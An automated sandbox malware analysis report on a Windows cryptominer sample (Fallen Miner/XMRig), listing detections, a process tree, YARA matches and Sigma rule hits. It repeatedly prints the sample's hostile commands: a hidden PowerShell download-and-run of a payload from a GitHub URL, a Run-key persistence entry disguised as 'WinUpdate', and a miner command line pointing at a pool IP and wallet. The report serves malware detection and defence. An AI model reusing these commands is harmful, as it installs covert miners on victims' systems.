Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
esFK2gm.exe

Overview

General Information

Sample name:esFK2gm.exe
Analysis ID:1632653
MD5:90b1db23bfe95b39d48a5a628c6e2a46
SHA1:486b88f6f2928a03b26471376f60569ad28cfcd0
SHA256:770b494198e289dd91a8731dc4538bd36ac37b425f21e2a854cee956dec4452c
Tags:CoinMinerexeuser-aachum
Infos:

Detection

Fallen Miner, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
System process connects to network (likely due to code injection or exploit)
Yara detected Fallen Miner
Yara detected Xmrig cryptocurrency miner
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Detected Stratum mining protocol
Found Tor onion address
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Notepad Making Network Connection
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • esFK2gm.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\esFK2gm.exe" MD5: 90B1DB23BFE95B39D48A5A628C6E2A46)
    • notepad.exe (PID: 7076 cmdline: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25 MD5: 27F71B12CB585541885A31BE22F61C83)
    • tasklist.exe (PID: 6948 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1864 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 3460 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 2256 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 4200 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1548 cmdline: tasklist /FI "PID eq 7076" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7092 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1820 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7028 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1328 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • win_init.exe (PID: 916 cmdline: "C:\Users\user\AppData\Roaming\win_init.exe" MD5: 90B1DB23BFE95B39D48A5A628C6E2A46)
  • svchost.exe (PID: 2448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 6180 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7028 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2732 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 3112 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • cmd.exe (PID: 5840 cmdline: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3776 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Sleep -s 30; Start-Process 'C:\Users\user\AppData\Roaming\win_init.exe' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • win_init.exe (PID: 6092 cmdline: "C:\Users\user\AppData\Roaming\win_init.exe" MD5: 90B1DB23BFE95B39D48A5A628C6E2A46)
  • sppsvc.exe (PID: 1680 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 4724 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4380 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
esFK2gm.exeJoeSecurity_FallenMinerYara detected Fallen MinerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        sslproxydump.pcapMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x5d91cb:$a1: mining.set_target
        • 0x1e5cfbb:$a1: mining.set_target
        • 0x24d710f:$a1: mining.set_target
        • 0x5d370d:$a2: XMRIG_HOSTNAME
        • 0x1e574b7:$a2: XMRIG_HOSTNAME
        • 0x24d1651:$a2: XMRIG_HOSTNAME
        • 0x5d5953:$a3: Usage: xmrig [OPTIONS]
        • 0x1e59789:$a3: Usage: xmrig [OPTIONS]
        • 0x24d38dd:$a3: Usage: xmrig [OPTIONS]
        • 0x5d36e5:$a4: XMRIG_VERSION
        • 0x1e5748f:$a4: XMRIG_VERSION
        • 0x24d1629:$a4: XMRIG_VERSION

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Roaming\win_init.exeJoeSecurity_FallenMinerYara detected Fallen MinerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0xdc70:$a1: mining.set_target
            • 0x8658:$a2: XMRIG_HOSTNAME
            • 0xa740:$a3: Usage: xmrig [OPTIONS]
            • 0x8630:$a4: XMRIG_VERSION
            00000000.00000002.2131272483.000000C0002B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              0000001E.00000002.1619147975.000000C00015E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  Click to see the 16 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  30.2.win_init.exe.c000160000.4.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    30.2.win_init.exe.c00015e000.7.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      30.2.win_init.exe.c00005c400.1.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                        0.2.esFK2gm.exe.c000a90000.3.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                          0.2.esFK2gm.exe.c000a90000.3.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                          • 0x586c70:$a1: mining.set_target
                          • 0x581658:$a2: XMRIG_HOSTNAME
                          • 0x583740:$a3: Usage: xmrig [OPTIONS]
                          • 0x581630:$a4: XMRIG_VERSION
                          Click to see the 20 entries

                          Sigma Signatures

                          Bitcoin Miner

                          barindex
                          Sigma detected: Xmrig
                          Source: Process startedAuthor: Joe Security: Data: Command: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25, CommandLine: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25, CommandLine|base64offset|contains: h^Wz, Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: "C:\Users\user\Desktop\esFK2gm.exe", ParentImage: C:\Users\user\Desktop\esFK2gm.exe, ParentProcessId: 6424, ParentProcessName: esFK2gm.exe, ProcessCommandLine: --donate-level 2 -o 45.144.212.77:3333 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=25, ProcessId: 7076, ProcessName: notepad.exe

                          System Summary

                          barindex
                          Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
                          Sigma detected: Invoke-Obfuscation VAR+ Launcher
                          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
                          Sigma detected: Notepad Making Network Connection
                          Source: Network ConnectionAuthor: EagleEye Team: Data: DestinationIp: 45.144.212.77, DestinationIsIpv6: false, DestinationPort: 3333, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49691
                          Sigma detected: Suspicious Invoke-WebRequest Execution
                          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 1820, ProcessName: powershell.exe
                          Sigma detected: Change PowerShell Policies to an Insecure Level
                          Source: Process startedAuthor: frack113: Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 1820, ProcessName: powershell.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\esFK2gm.exe, ProcessId: 6424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate
                          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1820, TargetFilename: C:\Users\user\AppData\Roaming\win_init.exe
                          Sigma detected: PowerShell Script Run in AppData
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
                          Sigma detected: PowerShell Web Download
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
                          Sigma detected: Suspicious Powershell In Registry Run Keys
                          Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\esFK2gm.exe, ProcessId: 6424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate
                          Sigma detected: Usage Of Web Request Commands And Cmdlets
                          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 7092, ProcessName: cmd.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7092, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\user\AppData\Roaming\win_init.exe'", ProcessId: 1820, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
